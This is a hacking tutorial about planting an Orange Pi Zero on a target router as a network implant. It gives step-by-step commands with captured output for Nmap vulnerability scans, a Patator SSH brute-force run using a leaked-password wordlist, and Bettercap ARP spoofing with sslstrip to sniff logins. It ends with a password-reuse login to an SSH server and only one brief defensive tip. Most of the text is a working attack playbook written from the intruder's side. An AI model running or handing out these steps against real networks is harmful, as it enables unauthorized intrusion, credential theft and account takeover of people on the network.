With a tiny computer, hackers can see every website you visit, exploit services on the network, and break into your Wi-Fi router's gateway to manipulate sensitive settings. These attacks can be performed from anywhere once the attacker's computer has been connected to the router via a network implant. The Orange Pi Zero and Armbian operating system must first be set up for remote access and network-based attacks before proceeding. The operating system is not weaponized out of the box, so be sure to review my previous article on setting everything up first. This kind of attack can be performed with a Raspberry Pi as well, but the below installation commands were only tested with the Orange Pi Zero. Previously: How to Set Up Network Implants with a Cheap SBC tokyoneon/Null Byte This article will focus on performing several network-based attacks after the Orange Pi Zero has been planted on the target router. The tools and attacks featured here are far from a complete depiction of how much damage an attacker can inflict on a network., but it's a good start to showing how dangerous a network implant can be in the wrong hands. Recommended on Amazon: Orange Pi Zero 512 MB + Protective White Case

1. Perform Network Recon & CVE Detection with Nmap Nmap is one of the essential network-mapping tools. We can begin by installing it on the Orange Pi Zero with the following apt-get commands. root@orangepizero:~# apt-get update && apt-get install nmap Next, install some useful NSE scripts such as the nmap-vulners and vulscan as shown in my previous article detecting CVEs with Nmap scripts. When those tools are loaded onto the Orange Pi Zero, we can start by identifying the IP address, netmask, and route given to the Orange Pi Zero by target router. root@orangepizero:~# ip addr 3: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000 link/ether XX:XX:XX:XX:XX:XX brd ff:ff:ff:ff:ff:ff inet 192.168.8.138/24 brd 192.168.8.255 scope global dynamic eth0 valid_lft 86056sec preferred_lft 86056sec inet6 xxxx::xxxx:xxxx:xxxx:xxxx/64 scope link valid_lft forever preferred_lft forever We can see the 192.168.8.138/24 address and presume the router is at 192.168.8.1, verifiable with the ip route command. Then, perform a ping scan (-sn) on the entire network to discover available hosts. root@orangepizero:~# nmap -sn 192.168.8.1/24 Starting Nmap 7.40 ( https://nmap.org ) at 2019-04-15 01:17 UTC Nmap scan report for 192.168.8.1 Host is up (0.00038s latency). MAC Address: XX:XX:XX:XX:XX:XX (Mediabridge Products) Nmap scan report for 192.168.8.2 Host is up (0.00049s latency). MAC Address: XX:XX:XX:XX:XX:XX (Mediabridge Products) Nmap scan report for 192.168.8.179 Host is up (-0.088s latency). MAC Address: XX:XX:XX:XX:XX:XX (Sony) Nmap scan report for 192.168.8.183 Host is up (-0.10s latency). MAC Address: XX:XX:XX:XX:XX:XX (Unknown) Nmap scan report for 192.168.8.138 Host is up. Nmap done: 256 IP addresses (5 hosts up) scanned in 4.45 seconds If, for example, we found the Sony device on 192.168.8.183 to be interesting, we could further probe that host. root@orangepizero:~# nmap -sV -T4 --script nmap-vulners -F -A 192.168.8.183 Starting Nmap 7.40 ( https://nmap.org ) at 2019-04-15 01:19 UTC Nmap scan report for 192.168.8.183 Host is up (0.00080s latency). Not shown: 99 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | vulners: | cpe:/a:openbsd:openssh:7.6p1: | CVE-2018-15919 5.0 https://vulners.com/cve/CVE-2018-15919 |_ CVE-2018-15473 5.0 https://vulners.com/cve/CVE-2018-15473 MAC Address: 48:1C:52:9F:A6:71 (Unknown) Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.6 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel We can see the nmap-vulners NSE script discovered two CVEs with this particular SSH server. The host is almost certainly an Ubuntu machine, so automated updates have probably done a good job about patching severe security vulnerabilities. We could further probe the service or other hosts on the network with more advanced Nmap scans and scripts. For more on Nmap, check out some of the following articles. Top 5 Intrusive Nmap Scripts Hackers & Pentesters Should Know

How to Automate Brute-Force Attacks for Nmap Scans

Using the Nmap Scripting Engine (NSE) for Reconnaissance

2. Perform Brute-Force Attacks with Patator Like Hydra and Medusa, Patator is a highly flexible, full-featured, command-line brute-forcing tool. It has quickly become one of my favorite hacking instruments. In my previous article, Patator was used to perform a dictionary attack against different router gateways, which is very appropriate for a network-based attack such as this Orange Pi Zero hack. This time, however, I'll show Patator's SSH brute-forcing module. Don't Miss: How to Break into Router Gateways with Patator First, install the necessary dependencies required by the Patator Python script. There are quite a few packages, so this process can take up to ten minutes to complete. Prepending the screen command (Screen should be installed) is recommended. In the event the SSH connection breaks, Screen will keep the installation running and accessible when the connection is re-established. root@orangepizero:~# screen apt-get install libcurl4-openssl-dev python3-dev libssl-dev ldap-utils default-libmysqlclient-dev ike-scan unzip default-jdk libsqlite3-dev libsqlcipher-dev python-setuptools python-pip libpq-dev python-dev libffi6 libffi-dev pkg-config autoconf python-dev cmake Reading package lists... Done Building dependency tree Reading state information... Done The following NEW packages will be installed: adwaita-icon-theme ca-certificates-java default-jdk default-jdk-headless default-jre default-jre-headless fontconfig fontconfig-config fonts-dejavu-core gtk-update-icon-cache hicolor-icon-theme ike-scan java-common ldap-utils libasyncns0 libatk-bridge2.0-0 libatk-wrapper-java libatk-wrapper-java-jni libatk1.0-0 libatk1.0-data libatspi2.0-0 libavahi-client3 libavahi-common-data libavahi-common3 libcairo-gobject2 libcairo2 libcolord2 libcroco3 libcups2 libcurl4-openssl-dev libdatrie1 libdrm2 libegl1-mesa libepoxy0 libexpat1-dev libflac8 libfontconfig1 libfontenc1 libfreetype6 libgbm1 libgdk-pixbuf2.0-0 libgdk-pixbuf2.0-common libgif7 libgl1-mesa-glx libglapi-mesa libgraphite2-3 libgtk-3-0 libgtk-3-common libgtk2.0-0 libgtk2.0-common libharfbuzz0b libice6 libjbig0 libjpeg62-turbo libjson-glib-1.0-0 libjson-glib-1.0-common liblcms2-2 libnspr4 libnss3 libogg0 libpango-1.0-0 libpangocairo-1.0-0 libpangoft2-1.0-0 libpixman-1-0 libpulse0 libpython3-dev libpython3.5 libpython3.5-dev librest-0.7-0 librsvg2-2 librsvg2-common libsm6 libsndfile1 libsoup-gnome2.4-1 libsqlcipher-dev libsqlcipher0 libsqlite3-dev libthai-data libthai0 libtiff5 libvorbis0a libvorbisenc2 libwayland-client0 libwayland-cursor0 libwayland-egl1-mesa libwayland-server0 libx11-6 libx11-data libx11-xcb1 libxau6 libxaw7 libxcb-dri2-0 libxcb-dri3-0 libxcb-glx0 libxcb-present0 libxcb-render0 libxcb-shape0 libxcb-shm0 libxcb-sync1 libxcb-xfixes0 libxcb1 libxcomposite1 libxcursor1 libxdamage1 libxdmcp6 libxext6 libxfixes3 libxft2 libxi6 libxinerama1 libxkbcommon0 libxmu6 libxmuu1 libxpm4 libxrandr2 libxrender1 libxshmfence1 libxt6 libxtst6 libxv1 libxxf86dga1 libxxf86vm1 openjdk-8-jdk openjdk-8-jdk-headless openjdk-8-jre openjdk-8-jre-headless python3-dev python3.5-dev shared-mime-info x11-common x11-utils 0 upgraded, 131 newly installed, 0 to remove and 0 not upgraded. Need to get 112 MB of archives. After this operation, 312 MB of additional disk space will be used. Do you want to continue? [Y/n] Upgrade the setuptools and wheel packages using the following pip command. root@orangepizero:~# pip install --upgrade setuptools wheel Collecting setuptools Downloading https://files.pythonhosted.org/packages/c8/b0/cc6b7ba28d5fb790cf0d5946df849233e32b8872b6baca10c9e002ff5b41/setuptools-41.0.0-py2.py3-none-any.whl (575kB) 100% |████████████████████████████████| 583kB 181kB/s Installing collected packages: setuptools Found existing installation: setuptools 33.1.1 Not uninstalling setuptools at /usr/lib/python2.7/dist-packages, outside environment /usr Successfully installed setuptools-41.0.0 Clone the Patator GitHub repository with the git command. root@orangepizero:~# git clone https://github.com/lanjelot/patator/ /opt/patator Cloning into '/opt/patator'... remote: Enumerating objects: 457, done. remote: Total 457 (delta 0), reused 0 (delta 0), pack-reused 457 Receiving objects: 100% (457/457), 325.11 KiB | 149.00 KiB/s, done. Resolving deltas: 100% (157/157), done. Change (cd) into the new /opt/patator/ directory. root@orangepizero:~# cd /opt/patator/ Then, use pip again to install more requirements. This process can take up to 20 minutes to complete. The pynacl and cryptography packages seemed to take especially long in my tests, so be patient. root@orangepizero:/opt/patator# pip install -r requirements.txt Downloading https://files.pythonhosted.org/packages/cf/ae/94e70d49044ccc234bfdba20114fa947d7ba6eb68a2e452d89b920e62227/paramiko-2.4.2-py2.py3-none-any.whl (193kB) 100% |████████████████████████████████| 194kB 216kB/s Collecting pycurl (from -r requirements.txt (line 2)) Downloading https://files.pythonhosted.org/packages/e8/e4/0dbb8735407189f00b33d84122b9be52c790c7c3b25286826f4e1bdb7bde/pycurl-7.43.0.2.tar.gz (214kB) 100% |████████████████████████████████| 215kB 172kB/s Collecting ajpy (from -r requirements.txt (line 3)) Downloading https://files.pythonhosted.org/packages/12/dd/e641d8c0b3b14eed50122a3c090ff9150bd0988fd0790d4819cd8083e83d/ajpy-0.0.4.tar.gz Collecting pyopenssl (from -r requirements.txt (line 5)) Downloading https://files.pythonhosted.org/packages/01/c8/ceb170d81bd3941cbeb9940fc6cc2ef2ca4288d0ca8929ea4db5905d904d/pyOpenSSL-19.0.0-py2.py3-none-any.whl (53kB) 100% |████████████████████████████████| 61kB 66kB/s Collecting cx_Oracle (from -r requirements.txt (line 6)) Downloading https://files.pythonhosted.org/packages/4b/aa/99e49d10e56ff0263a8927f4ddb7e8cdd4671019041773f61b3259416043/cx_Oracle-7.1.2.tar.gz (289kB) 100% |████████████████████████████████| 296kB 177kB/s Collecting mysqlclient (from -r requirements.txt (line 7)) Downloading https://files.pythonhosted.org/packages/f4/f1/3bb6f64ca7a429729413e6556b7ba5976df06019a5245a43d36032f1061e/mysqlclient-1.4.2.post1.tar.gz (85kB) 100% |████████████████████████████████| 92kB 98kB/s Collecting psycopg2-binary (from -r requirements.txt (line 8)) Downloading https://files.pythonhosted.org/packages/dc/93/bb5655730913b88f9068c6b596177d1df83be0d476671199e17b06ea8436/psycopg2-binary-2.8.2.tar.gz (369kB) 100% |████████████████████████████████| 378kB 169kB/s Collecting pycrypto (from -r requirements.txt (line 9)) Downloading https://files.pythonhosted.org/packages/60/db/645aa9af249f059cc3a368b118de33889219e0362141e75d4eaf6f80f163/pycrypto-2.6.1.tar.gz (446kB) 100% |████████████████████████████████| 450kB 114kB/s ... Stored in directory: /root/.cache/pip/wheels/43/61/c8/0a4464601ce180d26e0a8dfdfa88c824e419dcc65bd43bda6e Running setup.py bdist_wheel for bcrypt ... done Stored in directory: /root/.cache/pip/wheels/6c/f0/60/8a8ebee44d14d3d6696f1e78960500777cb5b579caf33c1fe3 Running setup.py bdist_wheel for pycryptodomex ... done Stored in directory: /root/.cache/pip/wheels/83/37/75/85a95885e1e48d22cc6c964680e7938a19ca7c80eb814b2ff0 Running setup.py bdist_wheel for cffi ... done Stored in directory: /root/.cache/pip/wheels/bb/f8/22/e3e8d9dd87e0cc6df8201325bd0ae815e701d1ef2b95571cf2 Successfully built pycurl ajpy cx-Oracle mysqlclient psycopg2-binary pycrypto IPy pynacl cryptography bcrypt pycryptodomex cffi Installing collected packages: cffi, pynacl, asn1crypto, enum34, ipaddress, cryptography, bcrypt, pyasn1, paramiko, pycurl, ajpy, pyopenssl, cx-Oracle, mysqlclient, psycopg2-binary, pycrypto, dnspython, IPy, pycryptodomex, ply, pysmi, pysnmp Successfully installed IPy-1.0 ajpy-0.0.4 asn1crypto-0.24.0 bcrypt-3.1.6 cffi-1.12.2 cryptography-2.6.1 cx-Oracle-7.1.2 dnspython-1.16.0 enum34-1.1.6 ipaddress-1.0.22 mysqlclient-1.4.2.post1 paramiko-2.4.2 ply-3.11 psycopg2-binary-2.8.1 pyasn1-0.4.5 pycrypto-2.6.1 pycryptodomex-3.8.1 pycurl-7.43.0.2 pynacl-1.3.0 pyopenssl-19.0.0 pysmi-0.3.3 pysnmp-4.4.9 When that's done, verify Patator is working and view available modules with the --help option. root@orangepizero:/opt/patator# ./patator.py --help Patator v0.7 (https://github.com/lanjelot/patator) Usage: patator.py module --help Available modules: + ftp_login : Brute-force FTP + ssh_login : Brute-force SSH + telnet_login : Brute-force Telnet + smtp_login : Brute-force SMTP + smtp_vrfy : Enumerate valid users using SMTP VRFY + smtp_rcpt : Enumerate valid users using SMTP RCPT TO + finger_lookup : Enumerate valid users using Finger + http_fuzz : Brute-force HTTP + rdp_gateway : Brute-force RDP Gateway + ajp_fuzz : Brute-force AJP + pop_login : Brute-force POP3 + pop_passd : Brute-force poppassd (http://netwinsite.com/poppassd/) + imap_login : Brute-force IMAP4 + ldap_login : Brute-force LDAP + smb_login : Brute-force SMB + smb_lookupsid : Brute-force SMB SID-lookup + rlogin_login : Brute-force rlogin + vmauthd_login : Brute-force VMware Authentication Daemon + mssql_login : Brute-force MSSQL + oracle_login : Brute-force Oracle + mysql_login : Brute-force MySQL + mysql_query : Brute-force MySQL queries + rdp_login : Brute-force RDP (NLA) + pgsql_login : Brute-force PostgreSQL + vnc_login : Brute-force VNC + dns_forward : Forward DNS lookup + dns_reverse : Reverse DNS lookup + snmp_login : Brute-force SNMP v1/2/3 + ike_enum : Enumerate IKE transforms + unzip_pass : Brute-force the password of encrypted ZIP files + keystore_pass : Brute-force the password of Java keystore files + sqlcipher_pass : Brute-force the password of SQLCipher-encrypted databases + umbraco_crack : Crack Umbraco HMAC-SHA1 password hashes + tcp_fuzz : Fuzz TCP services + dummy_test : Testing module The very same SSH service, discovered previously, can now be brute-forced using Patator's ssh_login module. To view the available ssh_login options, use the below command. root@orangepizero:/opt/patator# ./patator.py ssh_login Patator v0.7 (https://github.com/lanjelot/patator) Usage: ssh_login <module-options ...> [global-options ...] Examples: ssh_login host=10.0.0.1 user=root password=FILE0 0=passwords.txt -x ignore:mesg='Authentication failed.' Module options: host : target host port : target port [22] user : usernames to test password : passwords to test auth_type : type of password authentication to use [password|keyboard-interactive|auto] keyfile : file with RSA, DSA or ECDSA private key to test persistent : use persistent connections [1|0] For a more complete, comprehensive list of options and arguments, use the ssh_login and --help options together. root@orangepizero:/opt/patator# ./patator.py ssh_login --help For demostration purposes, I'm using a wordlist created from leaked password databases. This can be quickly downloaded onto the Orange Pi Zero with the below wget command. root@orangepizero:/opt/patator# wget 'https://git.io/fhhvc' -O /tmp/simple_wordlist.txt --2019-04-15 02:19:09-- https://git.io/fhhvc Resolving git.io (git.io)... 52.203.53.176 Connecting to git.io (git.io)|52.203.53.176|:443... connected. HTTP request sent, awaiting response... 302 Found Location: https://raw.githubusercontent.com/tokyoneon/1wordlist/master/1wordlist2rulethem%40ll.txt [following] --2019-04-15 02:19:13-- https://raw.githubusercontent.com/tokyoneon/1wordlist/master/1wordlist2rulethem%40ll.txt Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 199.232.8.133 Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|199.232.8.133|:443... connected. HTTP request sent, awaiting response... 200 OK Length: 25585 (25K) [text/plain] Saving to: ‘/tmp/simple_wordlist.txt’ /tmp/simple_wordlist.txt 100%[==============================>] 24.99K 59.7KB/s in 0.4s 2019-04-15 02:19:22 (59.7 KB/s) - ‘/tmp/simple_wordlist.txt’ saved [25585/25585] Finally, brute-force the SSH service using the following Patator command. root@orangepizero:/opt/patator# ./patator.py ssh_login host=192.168.8.183 port=22 user=root password=FILE0 0=/tmp/simple_wordlist.txt -t 1 INFO - Starting Patator v0.7 (https://github.com/lanjelot/patator) at 2019-04-14 07:25 UTC INFO - INFO - code size time | candidate | num | mesg INFO - ----------------------------------------------------------------------------- INFO - 1 22 2.005 | 123456 | 1 | Authentication failed. INFO - 1 22 2.277 | Abcdef123 | 2 | Authentication failed. INFO - 1 22 1.344 | a123456 | 3 | Authentication failed. INFO - 1 22 1.814 | little123 | 4 | Authentication failed. INFO - 1 22 2.081 | nanda334 | 5 | Authentication failed. INFO - 1 22 2.023 | N97nokia | 6 | Authentication failed. INFO - 1 22 1.676 | password | 7 | Authentication failed. INFO - 1 22 2.249 | Pawerjon123 | 8 | Authentication failed. INFO - 1 22 2.180 | 421uiopy258 | 9 | Authentication failed. INFO - 1 22 2.116 | MYworklist123 | 10 | Authentication failed. INFO - 1 22 1.879 | 12345678 | 11 | Authentication failed. INFO - 1 22 2.015 | qwerty | 12 | Authentication failed. INFO - 1 22 1.772 | nks230kjs82 | 13 | Authentication failed. INFO - 1 22 2.212 | trustno1 | 14 | Authentication failed. INFO - 1 22 1.631 | zxcvbnm | 15 | Authentication failed. INFO - 1 22 2.116 | N97nokiamini | 16 | Authentication failed. INFO - 1 22 2.050 | letmein | 17 | Authentication failed. INFO - 1 22 1.814 | 123456789 | 18 | Authentication failed. INFO - 1 22 2.107 | myplex | 19 | Authentication failed. INFO - 1 22 0.042 | tokyoneon | 20 | Authentication failed. INFO - 1 22 2.375 | gm718422@ | 21 | Authentication failed. INFO - 1 22 1.613 | churu123A | 22 | Authentication failed. INFO - 1 22 1.914 | abc123 | 23 | Authentication failed. INFO - 1 22 1.820 | plex123 | 24 | Authentication failed. INFO - 1 22 1.778 | any123456 | 25 | Authentication failed. INFO - 1 22 2.048 | Lwf1681688 | 26 | Authentication failed. INFO - Hits/Done/Skip/Fail/Size: 26/26/0/0/26, Avg: 0 r/s, Time: 0h 0m 51s Patator will brute-force the host= on the specified post= with the wordlist (0). To avoid overwhelming the SSH service with too many password attempts per second, use the -t to specify the number of concurrent threads. This value is set to ten by default, but increase and decrease it as needed.

3. Perform Man-in-the-Middle Attacks with Bettercap Before installing Bettercap, the Go (Golang) programming language will need to be installed first. Bettercap relies on the later version of Golang that isn't available in the Debian repositories. To get the latest version of Golang, start by downloading the dependencies. root@orangepizero:~# apt-get install libpcap-dev libusb-1.0-0-dev libnetfilter-queue-dev Reading package lists... Done Building dependency tree Reading state information... Done build-essential is already the newest version (12.3). golang is already the newest version (2:1.7~5). The following additional packages will be installed: libnetfilter-queue1 libnfnetlink-dev libpcap0.8-dev pkg-config Recommended packages: libusb-1.0-doc The following NEW packages will be installed: libnetfilter-queue-dev libnetfilter-queue1 libnfnetlink-dev libpcap-dev libpcap0.8-dev libusb-1.0-0-dev pkg-config 0 upgraded, 7 newly installed, 0 to remove and 0 not upgraded. Need to get 405 kB of archives. After this operation, 1,142 kB of additional disk space will be used. Do you want to continue? [Y/n] If you're not already root, change into the /root/ directory for the following commands. Using the /tmp directory isn't advised as the Orange Pi Zero may run out of memory during specific processes. root@orangepizero:~# cd /root/ Then, download the tar.gz file containing the Golang source code. root@orangepizero:~# wget 'https://dl.google.com/go/go1.12.7.linux-armv6l.tar.gz' --2019-04-13 19:52:48-- https://dl.google.com/go/go1.12.7.linux-armv6l.tar.gz Resolving dl.google.com (dl.google.com)... 172.217.194.93, 172.217.194.136, 172.217.194.190, ... Connecting to dl.google.com (dl.google.com)|172.217.194.93|:443... connected. HTTP request sent, awaiting response... 200 OK Length: 106218905 (101M) [application/octet-stream] Saving to: ‘go1.12.7.linux-armv6l.tar.gz’ go1.12.7.linux-armv6l.tar.gz 100%[==============================>] 101.30M 3.28MB/s in 34s 2019-04-13 19:53:22 (3.02 MB/s) - ‘go1.12.7.linux-armv6l.tar.gz’ saved [106218905/106218905] Next, unpack the compressed tar.gz file. root@orangepizero:~# tar -C /usr/local -xzf go1.*.tar.gz The $PATH needs to be defined to perform the following commands. root@orangepizero:~# export PATH=$PATH:/usr/local/go/bin Now, before cloning the Bettercap repository, the amount of available "swap memory" on the Orange Pi Zero needs to be expanded. Swap is defined as part of the hard drive that has been allocated by the operating system as temporary memory. When the operating system has used up all of the available hardware RAM (512 MB for the Orange Pi Zero), it uses the swap. To create a new swap area, use the below dd command to create a 2 GB (2048) file containing /dev/zero null data. This command should take about three minutes to complete. root@orangepizero:~# dd if=/dev/zero of=/root/swapfile bs=1M count=2048 2048+0 records in 2048+0 records out 2147483648 bytes (2.1 GB, 2.0 GiB) copied, 195.927 s, 11.0 MB/s Then, use the mkswap command. Disregard the "insecure permissions" warning. On a non-hacking system, this command would be executed differently. But it's not essential to this specific scenario. root@orangepizero:~# mkswap /root/swapfile mkswap: /root/swapfile: insecure permissions 0644, 0600 suggested. Setting up swapspace version 1, size = 2 GiB (2147479552 bytes) no label, UUID=e629a001-7a20-4346-8479-4a04fae459af Enable the new swap area with the swapon command. root@orangepizero:~# swapon /root/swapfile swapon: /root/swapfile: insecure permissions 0644, 0600 suggested. The new swap space can be verified using the free command to view available memory. root@orangepizero:~# free -ht total used free shared buff/cache available Mem: 493M 84M 9.0M 604K 399M 397M Swap: 2.2G 19M 2.2G Total: 2.7G 104M 2.2G Notice the Swap: is over 2 GB. Now, back to the Bettercap install process. Clone the Bettercap GitHub repository with the following go command. root@orangepizero:~# go get github.com/bettercap/bettercap Then, define the $GOPATH with the export command. root@orangepizero:~# export GOPATH=/root/go/ Change into the newly create Bettercap directory. root@orangepizero:~# cd $GOPATH/src/github.com/bettercap/bettercap Execute the make build command. No output will occur. root@orangepizero:~/go/src/github.com/bettercap/bettercap# make build Finally, install Bettercap with the make install command. root@orangepizero:~/go/src/github.com/bettercap/bettercap# make install To start using Bettercap, use the following command with the -iface option to specify the target (router) interface. Otherwise, Bettercap might attack devices authenticated to the Orange Pi Zero's Wi-Fi hotspot — if that was set up previously. Screen is also recommended here. It will keep Bettercap running persistently if you choose to temporarily disconnect from the Orange Pi Zero and reconnect at a later time. root@orangepizero:~/go/src/github.com/bettercap/bettercap# screen bettercap -iface eth0 bettercap v2.23 (built for linux arm with go1.12.4) [type 'help' for a list of commands] 192.168.8.0/24 > 192.168.8.138 » For starters, we can use the help command to view available options and running modules. 10.#.#.#/24 > 10.#.#.## » help help MODULE : List available commands or show module specific help if no module name is provided. active : Show information about active modules. quit : Close the session and exit. sleep SECONDS : Sleep for the given amount of seconds. get NAME : Get the value of variable NAME, use * alone for all, or NAME* as a wildcard. set NAME VALUE : Set the VALUE of variable NAME. read VARIABLE PROMPT : Show a PROMPT to ask the user for input that will be saved inside VARIABLE. clear : Clear the screen. include CAPLET : Load and run this caplet in the current session. ! COMMAND : Execute a shell command and print its output. alias MAC NAME : Assign an alias to a given endpoint given its MAC address. Modules any.proxy > not running api.rest > not running arp.spoof > not running ble.recon > not running caplets > not running dhcp6.spoof > not running dns.spoof > not running events.stream > running gps > not running hid > not running http.proxy > not running http.server > not running https.proxy > not running https.server > not running mac.changer > not running mysql.server > not running net.probe > not running net.recon > not running net.sniff > not running packet.proxy > not running syn.scan > not running tcp.proxy > not running ticker > not running ui > not running update > not running wifi > not running wol > not running 192.168.8.0/24 > 192.168.8.138 » Then, fetch the latest caplets from the Bettercap repository with the caplets.update command. Caplets are used to automate Bettercap commands and options. 10.#.#.#/24 > 10.#.#.## » caplets.update [21:18:57] [sys.log] [inf] caplets downloading caplets from https://github.com/bettercap/caplets/archive/master.zip ... [21:19:03] [sys.log] [inf] caplets installing caplets to /usr/local/share/bettercap/caplets ... Use caplets.show to view the installed caplets and their location on the operating system. You are encouraged to review the caplet files for brief descriptions of what each one does. 10.#.#.#/24 > 10.#.#.## » caplets.show ┌─────────────────────────────────────┬────────────────────────────────────────────────────────────────────────────┬────────┐ │ Name │ Path │ Size │ ├─────────────────────────────────────┼────────────────────────────────────────────────────────────────────────────┼────────┤ │ ap │ /usr/local/share/bettercap/caplets/ap.cap │ 307 B │ │ crypto-miner/crypto-miner │ /usr/local/share/bettercap/caplets/crypto-miner/crypto-miner.cap │ 666 B │ │ download-autopwn/download-autopwn │ /usr/local/share/bettercap/caplets/download-autopwn/download-autopwn.cap │ 2.6 kB │ │ fb-phish/fb-phish │ /usr/local/share/bettercap/caplets/fb-phish/fb-phish.cap │ 140 B │ │ gitspoof/gitspoof │ /usr/local/share/bettercap/caplets/gitspoof/gitspoof.cap │ 216 B │ │ gps │ /usr/local/share/bettercap/caplets/gps.cap │ 109 B │ │ hstshijack/hstshijack │ /usr/local/share/bettercap/caplets/hstshijack/hstshijack.cap │ 799 B │ │ http-req-dump/http-req-dump │ /usr/local/share/bettercap/caplets/http-req-dump/http-req-dump.cap │ 591 B │ │ http-ui │ /usr/local/share/bettercap/caplets/http-ui.cap │ 382 B │ │ https-ui │ /usr/local/share/bettercap/caplets/https-ui.cap │ 661 B │ │ jsinject/jsinject │ /usr/local/share/bettercap/caplets/jsinject/jsinject.cap │ 210 B │ │ local-sniffer │ /usr/local/share/bettercap/caplets/local-sniffer.cap │ 244 B │ │ login-manager-abuse/login-man-abuse │ /usr/local/share/bettercap/caplets/login-manager-abuse/login-man-abuse.cap │ 236 B │ │ mana │ /usr/local/share/bettercap/caplets/mana.cap │ 61 B │ │ massdeauth │ /usr/local/share/bettercap/caplets/massdeauth.cap │ 302 B │ │ mitm6 │ /usr/local/share/bettercap/caplets/mitm6.cap │ 551 B │ │ netmon │ /usr/local/share/bettercap/caplets/netmon.cap │ 42 B │ │ pita │ /usr/local/share/bettercap/caplets/pita.cap │ 900 B │ │ proxy-script-test/proxy-script-test │ /usr/local/share/bettercap/caplets/proxy-script-test/proxy-script-test.cap │ 57 B │ │ rogue-mysql-server │ /usr/local/share/bettercap/caplets/rogue-mysql-server.cap │ 501 B │ │ rtfm/rtfm │ /usr/local/share/bettercap/caplets/rtfm/rtfm.cap │ 210 B │ │ simple-passwords-sniffer │ /usr/local/share/bettercap/caplets/simple-passwords-sniffer.cap │ 131 B │ │ tcp-req-dump/tcp-req-dump │ /usr/local/share/bettercap/caplets/tcp-req-dump/tcp-req-dump.cap │ 413 B │ │ web-override/web-override │ /usr/local/share/bettercap/caplets/web-override/web-override.cap │ 254 B │ └─────────────────────────────────────┴────────────────────────────────────────────────────────────────────────────┴────────┘ To quickly enumerate active hosts on the network, invoke the netmon caplet with the include command. 10.#.#.#/24 > 10.#.#.## » include netmon ┌───────────────┬───────────────────┬─────────────┬────────────────────────────┬───────┬────────┬──────────┐ │ IP ▴ │ MAC │ Name │ Vendor │ Sent │ Recvd │ Seen │ ├───────────────┼───────────────────┼─────────────┼────────────────────────────┼───────┼────────┼──────────┤ │ 192.168.8.138 │ XX:XX:XX:XX:XX:XX │ eth0 │ │ 0 B │ 0 B │ 21:18:37 │ │ 192.168.8.1 │ XX:XX:XX:XX:XX:XX │ gateway │ Mediabridge Products, LLC. │ 19 kB │ 8.6 kB │ 21:18:37 │ │ │ │ │ │ │ │ │ │ 192.168.8.179 │ XX:XX:XX:XX:XX:XX │ │ Sony Corporation │ 32 kB │ 128 kB │ 21:20:24 │ │ 192.168.8.193 │ XX:XX:XX:XX:XX:XX │ Windows 10 │ │ 916 B │ 1.3 kB │ 21:20:20 │ └───────────────┴───────────────────┴─────────────┴────────────────────────────┴───────┴────────┴──────────┘ ↑ 54 kB / ↓ 433 kB / 4310 pkts Alternatively, traffic transmitting between devices on the network can be sniffed by running the following six commands in order. 10.#.#.#/24 > 10.#.#.## » set http.proxy.sslstrip true 10.#.#.#/24 > 10.#.#.## » set arp.spoof.internal true 10.#.#.#/24 > 10.#.#.## » set net.sniff.verbose false 10.#.#.#/24 > 10.#.#.## » net.sniff on 10.#.#.#/24 > 10.#.#.## » http.proxy on 10.#.#.#/24 > 10.#.#.## » arp.spoof on Bettercap will begin to display a ton of data transmitting over the network. In some cases, there may be servers and services running on the network that don't support HTTPS or use it by default. These are prime targets for tools like Bettercap. Below is an example of a POST request made by a user authenticating to a media server running on one of the network devices. POST /media_server/Users/authenticatebyname HTTP/1.1 Host: 192.168.8.183:8096 Accept-Encoding: gzip, deflate X-media-Authorization: MediaBrowser Device="Firefox", DeviceId="TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6NjYuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Ni4wfDE1NTUzMTE3NzE5Mjg1", Version="4.0.2.0" Content-Length: 46 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 Referer: http://192.168.8.183:8096/web/index.html Content-Type: application/json Origin: http://192.168.8.183:8096 Accept: application/json Accept-Language: en-US,en;q=0.5 { "Username": "tokyoneon", "Pw": "secure_password-321" } Bettercap displays the username and password data found in the login request. These credentials can be used to pivot to other devices on the network, for example, the previously discovered SSH server on 192.168.8.183. Now that the attacker has some sense of the target's preferred username and password scheme, they can test the credentials against other services on the network. root@orangepizero:~# cd /opt/patator/ root@orangepizero:/opt/patator# ./patator.py ssh_login host=192.168.8.183 port=22 user=tokyoneon password='secure_password-321' -t 1 INFO - code size time | candidate | num | mesg INFO - ----------------------------------------------------------------------------- INFO - 0 39 0.117 | | 1 | SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3 INFO - Hits/Done/Skip/Fail/Size: 1/1/0/0/1, Avg: 0 r/s, Time: 0h 0m 1s The Patator request didn't return an "Authentication failed" message this time. This is a pretty good indication the password is correct. The same username and password can be used to log into the SSH server for a password reuse attack. root@orangepizero:/opt/patator# cd root@orangepizero:~# ssh -p 22 tokyoneon@192.168.8.183 The authenticity of host '192.168.8.183 (192.168.8.183)' can't be established. ECDSA key fingerprint is SHA256:3QmOhr8syz8l4HBWICG53DdVE2fStfHdO2Ri/nU4hBc. Are you sure you want to continue connecting (yes/no)? yes Welcome to Ubuntu 18.04.1 LTS (GNU/Linux 4.15.0-29-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage Last login: Mon Apr 15 07:27:14 2019 from 127.0.0.1 tokyoneon@ubuntu:~$ Don't Miss: How to Hack 200 Social Media Accounts in Less Than 2 Hours (Twitter, Reddit, Microsoft)

How to Protect Yourself Against Network Implant Attacks Enable HTTPS : The media server on the network didn't support HTTPS. This allowed the attacker to observe the login credentials using Bettercap. The use of HTTPS and other encrypted protocols will go a long way in thwarting an attackers ability to compromise the network further.

